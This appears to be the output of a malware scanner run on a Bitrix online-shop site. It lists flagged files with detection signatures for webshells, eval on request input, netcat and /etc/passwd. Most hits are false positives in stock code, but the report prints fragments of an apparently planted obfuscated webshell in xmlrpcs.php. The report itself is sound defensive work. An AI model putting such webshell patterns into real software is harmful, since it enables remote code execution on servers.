/var/www/allstarsO/allstars.ua/local/php_interface/include/events/404.php Size: 505.00 B Created: 2023-03-11 16:10:16 Modified: 2023-11-27 14:53:48 Dangers: 1
|
/var/www/allstarsO/allstars.ua/local/php_interface/include/catalog_import/cron_frame.php Size: 3.08 kB Created: 2023-03-11 16:10:17 Modified: 2023-11-27 14:53:48 Dangers: 1
|
/var/www/allstarsO/allstars.ua/local/php_interface/include/common_library/PHPExcel/Reader/Excel5.php Size: 224.97 kB Created: 2023-03-11 16:10:17 Modified: 2023-11-27 14:53:48 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 6787 Dangerous Hacker credits |
Hacked by
|
|
/var/www/allstarsO/allstars.ua/local/php_interface/include/common_library/PHPExcel/Shared/OLERead.php Size: 9.35 kB Created: 2023-03-11 16:10:16 Modified: 2023-11-27 14:53:48 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 306 Dangerous Hacker credits |
Hacked by
|
|
/var/www/allstarsO/allstars.ua/local/php_interface/include/common_library/PHPExcel/Shared/File.php Size: 5.10 kB Created: 2023-03-11 16:10:16 Modified: 2023-11-27 14:53:48 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 173 Dangerous Malware Signature (hash: 471b95ee) |
Suhosin
|
|
/var/www/allstarsO/allstars.ua/local/php_interface/include/common_library/PHPExcel/Shared/PCLZip/pclzip.lib.php Size: 192.53 kB Created: 2023-03-11 16:10:16 Modified: 2023-11-27 14:53:48 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2623 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2777 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3700 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3947 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5679 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
/var/www/allstarsO/allstars.ua/local/php_interface/vendor/pear/http_request2/docs/examples/upload-rapidshare.php Size: 2.00 kB Created: 2023-03-11 16:10:16 Modified: 2023-11-27 14:53:48 Dangers: 2
| Description | Match |
|---|
Exploit etc_passwd Line: 12 Dangerous The `/etc/passwd` file on Unix systems contains password information, an attacker who has accessed the `etc/passwd` file may attempt a brute force attack of all passwords on the system |
/etc/passwd
| Sign b236d073 Line: 12 Dangerous Malware Signature (hash: b236d073) |
/etc/passwd
|
|
/var/www/allstarsO/allstars.ua/local/php_interface/vendor/pear/http_request2/data/public-suffix-list.php Size: 156.30 kB Created: 2023-03-11 16:10:16 Modified: 2023-11-27 14:53:48 Dangers: 1
|
/var/www/allstarsO/allstars.ua/local/php_interface/vendor/pear/http_request2/tests/_network/redirects.php Size: 1.70 kB Created: 2023-03-11 16:10:16 Modified: 2023-11-27 14:53:48 Dangers: 1
| Description | Match |
|---|
Sign 11413268 Line: 26 Dangerous Malware Signature (hash: 11413268) |
exploit
|
|
/var/www/allstarsO/allstars.ua/local/templates/AllStarsNew/components/allstars/sale.basket.basket/.default/template.php Size: 2.73 kB Created: 2023-05-18 23:33:59 Modified: 2023-11-27 14:53:48 Dangers: 1
|
/var/www/allstarsO/allstars.ua/local/templates/AllStarsNew/components/allstars/sale.basket.basket/delayed/template.php Size: 2.31 kB Created: 2023-03-11 16:10:17 Modified: 2023-11-27 14:53:48 Dangers: 1
|
/var/www/allstarsO/allstars.ua/local/templates/AllStarsNew/components/allstars/sale.order.ajax/order_main_template/template.php Size: 4.87 kB Created: 2023-03-11 16:10:17 Modified: 2023-11-27 14:53:48 Dangers: 5
|
/var/www/allstarsO/allstars.ua/local/templates/AllStarsNew/components/allstars/sale.order.ajax/order_main_template/props.php Size: 4.64 kB Created: 2023-03-11 16:10:17 Modified: 2023-11-27 14:53:48 Dangers: 1
|
/var/www/allstarsO/allstars.ua/local/templates/AllStarsNew/components/allstars/sale.order.ajax/order_main_template/related_props.php Size: 408.00 B Created: 2023-03-11 16:10:17 Modified: 2023-11-27 14:53:48 Dangers: 1
|
/var/www/allstarsO/allstars.ua/local/templates/AllStarsNew/components/bitrix/sale.order.ajax/template_1/template.php Size: 7.30 kB Created: 2023-03-11 16:10:19 Modified: 2023-11-27 14:53:48 Dangers: 8
|
/var/www/allstarsO/allstars.ua/local/templates/AllStarsNew/components/bitrix/sale.order.ajax/template_1/props.php Size: 2.83 kB Created: 2023-03-11 16:10:19 Modified: 2023-11-27 14:53:48 Dangers: 1
|
/var/www/allstarsO/allstars.ua/local/templates/AllStarsNew/components/bitrix/sale.order.ajax/template_1/related_props.php Size: 408.00 B Created: 2023-03-11 16:10:19 Modified: 2023-11-27 14:53:48 Dangers: 1
|
/var/www/allstarsO/allstars.ua/local/templates/AllStarsNew/components/bitrix/sale.personal.order.list/order_history/template.php Size: 15.06 kB Created: 2023-03-11 16:10:18 Modified: 2023-11-27 14:53:48 Dangers: 2
|
/var/www/allstarsO/allstars.ua/personal/order/payment/result.php Size: 966.00 B Created: 2023-03-11 16:34:44 Modified: 2023-11-27 14:53:49 Dangers: 1
|
/var/www/allstarsO/allstars.ua/ua/personal/register/xmlrpcs.php Size: 848.00 B Created: 2023-03-14 04:41:14 Modified: 2023-11-27 14:53:49 Dangers: 3
| Description | Match |
|---|
Exploit nano Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$name[1]($name[0], implode('_',['', "code", ''])
| Exploit nano Line: 27 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$name[1]($name[0], implode('_',['', "\143ode", ''])
| Exploit var_as_func Line: 26 Dangerous RCE (Remote Code Execution) and Code Injection, through global vars used as PHP function, allow remote attackers to execute PHP code on the target machine via HTTP request |
$_GET[$name](str_rot13($txt)
|
|
/var/www/allstarsO/allstars.ua/bitrix/gadgets/bitrix/probki/.description.php Size: 142.00 B Created: 2023-03-11 16:45:10 Modified: 2023-11-27 14:53:18 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/gadgets/bitrix/probki/.parameters.php Size: 102.00 B Created: 2023-03-11 16:45:10 Modified: 2023-11-27 14:53:18 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/gadgets/bitrix/probki/index.php Size: 98.00 B Created: 2023-03-11 16:45:10 Modified: 2023-11-27 14:53:18 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/gadgets/bitrix/admin_info/index.php Size: 2.18 kB Created: 2023-03-11 16:45:11 Modified: 2023-11-27 14:53:18 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/gadgets/bitrix/weather/.description.php Size: 143.00 B Created: 2023-03-11 16:45:11 Modified: 2023-11-27 14:53:18 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/gadgets/bitrix/weather/city.php Size: 96.00 B Created: 2023-03-11 16:45:11 Modified: 2023-11-27 14:53:18 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/gadgets/bitrix/weather/.parameters.php Size: 103.00 B Created: 2023-03-11 16:45:11 Modified: 2023-11-27 14:53:18 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/gadgets/bitrix/weather/index.php Size: 99.00 B Created: 2023-03-11 16:45:11 Modified: 2023-11-27 14:53:18 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/gadgets/bitrix/admin_stat/index.php Size: 11.57 kB Created: 2023-03-11 16:45:12 Modified: 2023-11-27 14:53:18 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/gadgets/bitrix/admin_security/index.php Size: 4.50 kB Created: 2023-03-11 16:45:12 Modified: 2023-11-27 14:53:18 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/coupon_activation.php Size: 16.58 kB Created: 2023-03-11 16:45:13 Modified: 2023-11-27 14:52:55 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/components/allstars/catalog.section/component.php Size: 57.85 kB Created: 2023-06-25 19:11:02 Modified: 2023-11-27 14:53:13 Dangers: 1
| Description | Match |
|---|
Sign 11413268 Line: 298 Dangerous Malware Signature (hash: 11413268) |
eval($_REQUEST
|
|
/var/www/allstarsO/allstars.ua/bitrix/components/allstars/catalog.element/component.php Size: 64.20 kB Created: 2023-06-14 17:52:59 Modified: 2023-11-27 14:53:13 Dangers: 1
| Description | Match |
|---|
Sign 11413268 Line: 259 Dangerous Malware Signature (hash: 11413268) |
eval($_REQUEST
|
|
/var/www/allstarsO/allstars.ua/bitrix/components/allstars/sale.order.ajax/templates/.default/template.php Size: 7.04 kB Created: 2023-03-11 16:37:07 Modified: 2023-11-27 14:53:14 Dangers: 8
|
/var/www/allstarsO/allstars.ua/bitrix/components/allstars/sale.order.ajax/templates/.default/props.php Size: 5.08 kB Created: 2023-03-11 16:37:07 Modified: 2023-11-27 14:53:14 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/components/allstars/sale.order.ajax/templates/.default/related_props.php Size: 471.00 B Created: 2023-03-11 16:37:07 Modified: 2023-11-27 14:53:14 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/components/allstars/catalog.smart.filter/component.php Size: 28.44 kB Created: 2023-03-11 16:37:08 Modified: 2023-11-27 14:53:13 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 526 Warning Double var technique is usually used for the obfuscation of malicious code |
${$FILTER_NAME}
|
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/sale.location.import/templates/.default/template.php Size: 15.64 kB Created: 2023-03-11 16:35:21 Modified: 2023-11-27 14:53:17 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 11 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/sale.location.import/templates/admin/template.php Size: 12.30 kB Created: 2023-03-11 16:35:21 Modified: 2023-11-27 14:53:17 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 11 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/blog.post.edit/templates/.default/template.php Size: 21.63 kB Created: 2023-03-11 16:36:44 Modified: 2023-11-27 14:53:14 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/blog.post.edit/templates/.default/script.php Size: 26.06 kB Created: 2023-03-11 16:36:44 Modified: 2023-11-27 14:53:14 Warns: 1
| Description | Match |
|---|
Function eval Line: 140 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval(thetag + "_open");
if (tagOpen == 0)
{
if (doInsert("[" + thetag + "]", "[/" + thetag + "]", true))
{
eval(thetag + "_open = 1");
// Change the button status
pushstack(bbtags, thetag);
cstat();
}
}
else
{
// Find the last occurance of the opened tag
lastindex = 0;
for (i = 0 ; i < bbtags.length; i++ )
{
if ( bbtags[i] == thetag )
{
lastindex = i;
}
}
// Close all tags opened up to that tag was opened
while (bbtags[lastindex])
{
tagR...
|
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/blog.post.edit/templates/micro/template.php Size: 4.16 kB Created: 2023-03-11 16:36:44 Modified: 2023-11-27 14:53:14 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/mobileapp.menu/templates/.default/template.php Size: 12.57 kB Created: 2023-03-11 16:34:57 Modified: 2023-11-27 14:53:16 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec("showAuthForm");
}
}
<?endif;?>
if(BX.PULL)
{
BX.addCustomEvent("onPullExtendWatch", function(data) {
BX.PULL.extendWatch(data.id);
});
BX.addCustomEvent("thisPageWillDie", function(data) {
BX.PULL.clearWatch(data.page_id);
});
BX.addCustomEvent("onPullEvent", function (module_id, command, params)
{
if (module_id == 'main' && (command == 'user_authorize' || command == 'user_logout' || command == 'online_list'))
{
//app.onCustomEvent('onPullOnline', {...
|
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/catalog.section/component.php Size: 50.92 kB Created: 2023-03-11 16:35:56 Modified: 2023-11-27 14:53:14 Dangers: 1
| Description | Match |
|---|
Sign 11413268 Line: 323 Dangerous Malware Signature (hash: 11413268) |
eval($_REQUEST
|
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/main.interface.grid/component.php Size: 9.39 kB Created: 2023-03-11 16:35:01 Modified: 2023-11-27 14:53:15 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$a, $b', 'return strcmp($a["name"], $b["name"]);'); uasort($aOptions["views"], $func); $arResult["OPTIONS"] = $aOptions; $arResult["GLOBAL_OPTIONS"] = CUserOptions::GetOption("main.interface", "global", array(), 0); if($arParams["USE_THEMES"]) { if($arResult["GLOBAL_OPTIONS"]["theme_template"][SITE_TEMPLATE_ID] <> '') $arResult["GLOBAL_OPTIONS"]["theme"] = $arResult["GLOBAL_OPTIONS"]["theme_template"][SITE_TEMPLATE_ID]; if($arResult["OPTIONS"]["theme"] == '') $arResult["OPTIONS"...
|
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/blog/templates/one_blog_with_main_page/bitrix/blog.post.edit/.default/template.php Size: 23.20 kB Created: 2023-03-11 16:36:03 Modified: 2023-11-27 14:53:14 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/blog/templates/one_blog_with_main_page/bitrix/blog.post.edit/.default/script.php Size: 22.93 kB Created: 2023-03-11 16:36:03 Modified: 2023-11-27 14:53:14 Warns: 1
| Description | Match |
|---|
Function eval Line: 97 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval(thetag + "_open");
if (tagOpen == 0)
{
if (doInsert("[" + thetag + "]", "[/" + thetag + "]", true))
{
eval(thetag + "_open = 1");
// Change the button status
pushstack(bbtags, thetag);
cstat();
}
}
else
{
// Find the last occurance of the opened tag
lastindex = 0;
for (i = 0 ; i < bbtags.length; i++ )
{
if ( bbtags[i] == thetag )
{
lastindex = i;
}
}
// Close all tags opened up to that tag was opened
while (bbtags[lastindex])
{
tagR...
|
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/blog/templates/one_blog_with_main_page/bitrix/blog.post.comment/.default/template.php Size: 20.56 kB Created: 2023-03-11 16:36:03 Modified: 2023-11-27 14:53:14 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/blog/templates/one_blog_with_main_page/bitrix/blog.post.comment/.default/script.php Size: 11.35 kB Created: 2023-03-11 16:36:03 Modified: 2023-11-27 14:53:14 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval(thetag + "_open");
if (tagOpen == 0)
{
if (doInsert("[" + thetag + "]", "[/" + thetag + "]", true))
{
eval(thetag + "_open = 1");
// Change the button status
pushstack(bbtags, thetag);
cstat();
}
}
else
{
// Find the last occurance of the opened tag
lastindex = 0;
for (i = 0 ; i < bbtags.length; i++ )
{
if ( bbtags[i] == thetag )
{
lastindex = i;
}
}
// Close all tags opened up to that tag was opened
while (bbtags[lastindex])
{
tagR...
|
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/blog/templates/one_blog_old_version/bitrix/blog.post.comment/.default/template.php Size: 20.97 kB Created: 2023-03-11 16:36:07 Modified: 2023-11-27 14:53:14 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/catalog.link.list/component.php Size: 1.14 kB Created: 2023-03-11 16:35:34 Modified: 2023-11-27 14:53:14 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 19 Warning Double var technique is usually used for the obfuscation of malicious code |
${$FN}
|
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/report.view/templates/admin/template.php Size: 55.04 kB Created: 2023-03-11 16:37:04 Modified: 2023-11-27 14:53:16 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval('response = ' + data);
if (response)
{
if (response.imageData)
{
if (response.imageData.substr(0,10) === 'data:image')
{
img = BX('report-chart-image');
img.src = response.imageData;
if (response.legendInfo)
{
var legendContainer = BX('report-chart-legend-container');
var legendRowExample = BX('report-chart-legend-row-example');
var chartType = requestData['type'];
var legendNewRow, legendStick, legend...
|
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/sale.notice.product/templates/.default/template.php Size: 7.41 kB Created: 2023-03-11 16:34:58 Modified: 2023-11-27 14:53:17 Warns: 1
| Description | Match |
|---|
Function eval Line: 130 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval( '('+res+')' );
if (rs['ERRORS'].length > 0)
{
if (rs['ERRORS'] == 'NOTIFY_ERR_NULL')
BX('popup_n_error').innerHTML = '<?=GetMessageJS('NOTIFY_ERR_NULL')?>';
else if (rs['ERRORS'] == 'NOTIFY_ERR_CAPTHA')
BX('popup_n_error').innerHTML = '<?=GetMessageJS('NOTIFY_ERR_CAPTHA')?>';
else if (rs['ERRORS'] == 'NOTIFY_ERR_MAIL_EXIST')
{
BX('popup_n_error').innerHTML = '<?=GetMessageJS('NOTIFY_ERR_MAIL_BUYERS_EXIST')?>';
...
|
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/main.ui.grid/templates/.default/template.php Size: 31.21 kB Created: 2023-03-11 16:35:47 Modified: 2023-11-27 14:53:15 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval(<?=CUtil::phpToJSObject($arResult["DATA_FOR_EDIT"])?>);
var defaultColumns = eval(<?=CUtil::phpToJSObject($arResult["DEFAULT_COLUMNS"])?>);
var Grid = BX.Main.gridManager.getById('<?=$arParams["GRID_ID"]?>');
var messages = eval(<?=CUtil::phpToJSObject($arResult["MESSAGES"])?>);
Grid = Grid ? Grid.instance : null;
if (Grid)
{
Grid.arParams.DEFAULT_COLUMNS = defaultColumns;
Grid.arParams.MESSAGES = messages;
if (action !== 'more')
{
Grid.arParams.EDITABLE_DATA ...
|
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/socialnetwork_group/include/webdav.php Size: 25.02 kB Created: 2023-03-11 16:36:59 Modified: 2023-11-27 14:53:18 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/socialnetwork_group/include/webdav_settings.php Size: 12.94 kB Created: 2023-03-11 16:36:59 Modified: 2023-11-27 14:53:18 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/socialnetwork_group/templates/.default/bitrix/search.page/tags_icons/result_modifier.php Size: 16.66 kB Created: 2023-03-11 16:37:01 Modified: 2023-11-27 14:53:18 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/sale.basket.basket/templates/.default/template.php Size: 8.29 kB Created: 2023-03-11 16:36:17 Modified: 2023-11-27 14:53:17 Dangers: 4
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/sale.basket.order.ajax/component.php Size: 38.77 kB Created: 2023-03-11 16:34:52 Modified: 2023-11-27 14:53:17 Dangers: 1
| Description | Match |
|---|
Sign 11413268 Line: 556 Dangerous Malware Signature (hash: 11413268) |
eVal($_POST
|
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/sale.basket.order.ajax/templates/.default/template.php Size: 5.78 kB Created: 2023-03-11 16:34:52 Modified: 2023-11-27 14:53:17 Dangers: 7
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/forum.topic.list/component.php Size: 23.88 kB Created: 2023-03-11 16:36:29 Modified: 2023-11-27 14:53:15 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 244 Warning Double var technique is usually used for the obfuscation of malicious code |
${$PAGEN_NAME}
|
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/blog.post.comment/templates/.default/template.php Size: 30.38 kB Created: 2023-03-11 16:36:17 Modified: 2023-11-27 14:53:14 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/catalog.element/component.php Size: 49.25 kB Created: 2023-03-11 16:36:38 Modified: 2023-11-27 14:53:14 Dangers: 1
| Description | Match |
|---|
Sign 11413268 Line: 284 Dangerous Malware Signature (hash: 11413268) |
eval($_REQUEST
|
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/catalog.element/templates/.default/template.php Size: 64.84 kB Created: 2023-03-11 16:36:37 Modified: 2023-11-27 14:53:14 Dangers: 1
| Description | Match |
|---|
Exploit clever_include Line: 1114 Dangerous LFI (Local File Inclusion), through a image inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine |
INCLUDE' => $arParams['PRICE_VAT_INCLUDE'],
'CONVERT_CURRENCY' => $arParams['CONVERT_CURRENCY'],
'BASKET_URL' => $arParams['BASKET_URL'],
'ADD_PROPERTIES_TO_BASKET' => $arParams['ADD_PROPERTIES_TO_BASKET'],
'PRODUCT_PROPS_VARIABLE' => $arParams['PRODUCT_PROPS_VARIABLE'],
'PARTIAL_PRODUCT_PROPERTIES' => $arParams['PARTIAL_PRODUCT_PROPERTIES'],
'USE_PRODUCT_QUANTITY' => 'N',
'PRODUCT_QUANTITY_VARIABLE' => $arParams['PRODUCT_QUANTITY_VARIABLE'...
|
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/main.map/component.php Size: 5.85 kB Created: 2023-03-11 16:35:24 Modified: 2023-11-27 14:53:15 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit execution Line: 157 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER["DOCUMENT_ROOT"].$full_path.".section.php")
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("return ".$CONDITION.";"))) continue; } $search_child = false; $search_path = ''; $full_path = ''; if ($aMenu[1] <> '') { if(preg_match("'^(([A-Za-z]+://)|mailto:|javascript:)'i", $aMenu[1])) { $full_path = $aMenu[1]; } else { $full_path = trim(Rel2Abs(substr($PARENT_PATH, strlen($_SERVER["DOCUMENT_ROOT"])), $aMenu[1])); $slash_pos = strrpos($full_path, "/"); if ($slash_pos !== false) { $page = substr($full_path, $slash_pos+1); if(($pos = strpos($page, '?')) !== false) $page = substr($page,...
|
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/rss.show/component.php Size: 2.52 kB Created: 2023-03-11 16:35:28 Modified: 2023-11-27 14:53:16 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('&$val, $key', '$val=htmlspecialcharsex($val);')); elseif($arParams["PROCESS"] == "TEXT") array_walk_recursive($arResult, create_function('&$val, $key', '$val=str_replace(array(" ", "\\r\\n"), array(" ", "<br>"), HTMLToTxt($val));')); $this->IncludeComponentTemplate()
|
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/catalog.smart.filter.old/component.php Size: 27.39 kB Created: 2023-03-11 16:36:32 Modified: 2023-11-27 14:53:14 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 517 Warning Double var technique is usually used for the obfuscation of malicious code |
${$FILTER_NAME}
|
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/socialnetwork/include/webdav.php Size: 22.12 kB Created: 2023-03-11 16:36:23 Modified: 2023-11-27 14:53:18 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/socialnetwork/include/webdav_settings.php Size: 11.37 kB Created: 2023-03-11 16:36:23 Modified: 2023-11-27 14:53:18 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/socialnetwork/templates/.default/bitrix/search.page/tags_icons/result_modifier.php Size: 16.66 kB Created: 2023-03-11 16:36:22 Modified: 2023-11-27 14:53:18 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/socialnetwork/templates/.default/bitrix/search.page/tags_icons_user/result_modifier.php Size: 16.12 kB Created: 2023-03-11 16:36:22 Modified: 2023-11-27 14:53:18 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/socialnetwork_user/include/webdav.php Size: 25.08 kB Created: 2023-03-11 16:35:40 Modified: 2023-11-27 14:53:18 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/socialnetwork_user/include/webdav_settings.php Size: 13.03 kB Created: 2023-03-11 16:35:40 Modified: 2023-11-27 14:53:18 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/socialnetwork_user/templates/.default/bitrix/search.page/tags_icons_user/result_modifier.php Size: 16.12 kB Created: 2023-03-11 16:35:39 Modified: 2023-11-27 14:53:18 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/lists.element.edit/component.php Size: 31.11 kB Created: 2023-03-11 16:36:45 Modified: 2023-11-27 14:53:15 Dangers: 1
| Description | Match |
|---|
Sign 11413268 Line: 500 Dangerous Malware Signature (hash: 11413268) |
eval($_POST
|
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/catalog.top/component.php Size: 32.33 kB Created: 2023-03-11 16:36:27 Modified: 2023-11-27 14:53:14 Dangers: 1
| Description | Match |
|---|
Sign 11413268 Line: 234 Dangerous Malware Signature (hash: 11413268) |
eval($_REQUEST
|
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/main.post.form/templates/.default/template.php Size: 16.90 kB Created: 2023-03-11 16:36:45 Modified: 2023-11-27 14:53:15 Dangers: 3
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/photogallery_user/templates/.default/galleries_recalc.php Size: 9.64 kB Created: 2023-03-11 16:36:10 Modified: 2023-11-27 14:53:16 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("var result = " + data + "; "); }
if (result['status'] == 'inprogress')
{
document.getElementById('photogallery_recalc').innerHTML = result['text'];
if (__this_source.bReady == false)
{
document.getElementById('ButtonPhotoGalleryRecalcStart').disabled = false;
document.getElementById('ButtonPhotoGalleryRecalcContinue').disabled = false;
document.getElementById('ButtonPhotoGalleryRecalcStop').disabled = true;
}
else
{
document.getEleme...
|
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/catalog/templates/.default/section.php Size: 2.44 kB Created: 2023-03-11 16:35:02 Modified: 2023-11-27 14:53:14 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/catalog/templates/old_version_16/section_vertical.php Size: 23.92 kB Created: 2023-03-11 16:35:07 Modified: 2023-11-27 14:53:15 Dangers: 1
| Description | Match |
|---|
Exploit clever_include Line: 55 Dangerous LFI (Local File Inclusion), through a image inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine |
include",
"",
Array(
"AREA_FILE_SHOW" => "file",
"PATH" => $arParams["SIDEBAR_PATH"],
"AREA_FILE_RECURSIVE" => "N",
"EDIT_MODE" => "html",
),
false,
array('HIDE_ICONS' => 'Y')
);
?>
<?endif?>
</div>
<?endif?>
<div class="<?=(($isFilter || $isSidebar) ? "col-md-9 col-sm-8 col-sm-pull-4 col-md-pull-3" : "col-xs-12")?>">
<div class="row">
<div class="col-xs-12">
<?
if (ModuleManager::isModuleInstalled("sale"))
{
$arRecomData = array()...
|
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/catalog/templates/old_version_16/bitrix/catalog.element/.default/template.php Size: 40.07 kB Created: 2023-03-11 16:35:08 Modified: 2023-11-27 14:53:15 Dangers: 1
| Description | Match |
|---|
Exploit clever_include Line: 713 Dangerous LFI (Local File Inclusion), through a image inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine |
INCLUDE" => $arParams["PRICE_VAT_INCLUDE"],
"CONVERT_CURRENCY" => $arParams["CONVERT_CURRENCY"],
"BASKET_URL" => $arParams["BASKET_URL"],
"ADD_PROPERTIES_TO_BASKET" => $arParams["ADD_PROPERTIES_TO_BASKET"],
"PRODUCT_PROPS_VARIABLE" => $arParams["PRODUCT_PROPS_VARIABLE"],
"PARTIAL_PRODUCT_PROPERTIES" => $arParams["PARTIAL_PRODUCT_PROPERTIES"],
"USE_PRODUCT_QUANTITY" => 'N',
"OFFER_TREE_PROPS_{$arResult['OFFERS_IBLOCK']}" => $arParams['OFFER_TREE_PROPS'],
"CART_PROPERTIES_{...
|
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/catalog/templates/old_version_16/section.php Size: 2.44 kB Created: 2023-03-11 16:35:07 Modified: 2023-11-27 14:53:15 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/photogallery.detail.list.ex/templates/.default/template.php Size: 12.60 kB Created: 2023-03-11 16:36:50 Modified: 2023-11-27 14:53:16 Warns: 1
| Description | Match |
|---|
Exploit infected_comment Line: 111 Warning Comments composed by 5 random chars usually used to detect if a file is infected yet |
/*width*/
|
|
